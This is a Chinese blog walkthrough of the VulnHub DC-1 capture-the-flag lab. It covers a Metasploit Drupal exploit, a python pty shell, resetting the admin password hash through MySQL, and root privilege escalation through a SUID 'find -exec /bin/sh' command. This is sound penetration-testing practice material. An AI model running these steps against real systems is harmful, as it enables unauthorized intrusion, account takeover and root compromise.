渗透测试-vulnhub靶机 DC-1

信息收集

ip端口扫描

访问开启http 80端口

 用kali自带的msf进行漏洞利用

查看drupal漏洞模块

使用模块1,配置kali ip(lhost)和靶机ip(rhost),配置好后运行

使用shell进入桌面, python -c 'import pty;pty.spawn("/bin/bash") 输入命令显示路径

找到flag1.txt

使用find命令查找配置文件,打开文件,发现flag2.txt

查看flag2.txt文件,发现mysql账号密码

登陆mysql

连接正常,采取重置用户密码 的操作,查询资料了解到一般drupal对数据库的加密方法是把加密脚本放在网站根目录下scripts文件下,退出mysql,使用drupal自带脚本重新生成密码

 

 得到新密码的hash值之后对密码就可以进行修改密码的操作了,重新连接mysql数据库

update drupaldb.users set pass="$S$DZd1Uys/pTTUMeYxp/1itfVmFjcyvwol92Uw6qHT57M.geEQTujQ" where uid=1;

登陆网页 admin \ 123456

在content下发现flag3

查看flag3.txt

cat /etc/passwd下发现flag4用户

去家目录下查看flag4

查找root下的flag

find /perm -u=s -type f 2>/dev/null find / -perm -4000

发现find本身就是root权限的命令,此时也发现了它的路径:/usr/bin/find

使用find命令提权

ls -lh /usr/bin/find

find ./ aaa -exec '/bin/sh' \;

查看flag5.txt

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值